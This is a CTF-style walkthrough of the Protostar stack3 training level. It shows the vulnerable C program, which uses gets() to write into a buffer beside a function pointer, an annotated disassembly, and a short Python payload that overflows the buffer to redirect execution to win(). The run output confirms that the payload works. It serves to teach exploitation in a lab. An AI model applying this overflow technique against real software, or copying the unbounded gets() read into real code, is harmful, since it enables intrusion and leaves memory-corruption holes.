Binary Exploitation Protostar Stack3 - Walkthrough - Writeup

Hello Guyz,



Today, In this post I am going to share with you, walkthrough process to win Protostar stack3 level.
But before starting this walkthrough, Some Pre-requested Points


Before Starting This Walkthrough. I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

Hints Provided By Exploit-Exercise


Stack3 looks at environment variables, and how they can be set,
and overwriting function pointers stored on the stack
(as a prelude to overwriting the saved EIP)


Hints

both gdb and objdump is your friend you determining where the win() function lies in memory.
This level is at /opt/protostar/bin/stack3


Disassembly Of Main Routine

Dump of assembler code for function main:
                                  
0x08048438 <main+0>: push   ebp  ----------------------
0x08048439 <main+1>: mov    ebp,esp                   |----> Initialising FUnction
0x0804843b <main+3>: and    esp,0xfffffff0  -----------
0x0804843e <main+6>: sub    esp,0x60      -----------------> Creating Space In Stack 60 [hex]        
0x08048441 <main+9>: mov    DWORD PTR [esp+0x5c],0x0  -----> Update Value 0 of Variable Modified   [INjectable Area]
0x08048449 <main+17>: lea    eax,[esp+0x1c] ---------  -----> LOad Variable Buffer Starting Point Address Into EAX 1c [hex]
0x0804844d <main+21>: mov    DWORD PTR [esp],eax      |-----> Initialise Get Function Call
0x08048450 <main+24>: call   0x8048330 <gets@plt> -----   
0x08048455 <main+29>: cmp    DWORD PTR [esp+0x5c],0x0 ------> Compare Modified Variable With Zero
0x0804845a <main+34>: je     0x8048477 <main+63>      ------> Jump When Equal
0x0804845c <main+36>: mov    eax,0x8048560            ------> Load this Value Into EAX Registers
0x08048461 <main+41>: mov    edx,DWORD PTR [esp+0x5c]
0x08048465 <main+45>: mov    DWORD PTR [esp+0x4],edx
0x08048469 <main+49>: mov    DWORD PTR [esp],eax
0x0804846c <main+52>: call   0x8048350 <printf@plt>
0x08048471 <main+57>: mov    eax,DWORD PTR [esp+0x5c]
0x08048475 <main+61>: call   eax
0x08048477 <main+63>: leave  
0x08048478 <main+64>: ret 


Stack Status 

0                        28                                                      92             96
 ===============================================================================================
        Other Things     |  Bufffer this Area                                    | point to win | 
 ===============================================================================================
                                                                                       ^
                                                                                    Its Working Because Of fp() incorrect code

Our Plan

Friends, As we have done in the previous walkthrough, here again, we are going to overwrite another variable value stored Onto the stack after the buffer variable space. basically, we just going to overflow buffer variable space with more than 64 characters. but this time, instead of putting any character we are going to overwrite fd variable with the address of Win Function. why?
because as we can see in the source code. after if condition satisfaction, codes treating fp() variable as a function pointer. so, we just going to insert win function address
into fp variable memory area.


  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();

To find win function address we can use objdump.
Like This:

# objdump -d /opt/protostar/bin/stack3 | grep "win"

Exploit

#!/usr/bin/python
import struct


payload = ''
payload += 'a'*64
payload += struct.pack("i", 0x08048424) # Address Of Win Function
print payload


Yesss.. Another Victory.

Output

root@protostar:/opt/protostar/bin# python exploit.py 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa$� 
root@protostar:/opt/protostar/bin# python exploit.py > tmp
root@protostar:/opt/protostar/bin# ./stack3 < tmp
calling function pointer, jumping to 0x08048424
code flow successfully changed
root@protostar:/opt/protostar/bin#

For More Detailed Walk through Check Below Provided YouTube Video Playlist



Share this

Related Posts

Previous
Next Post »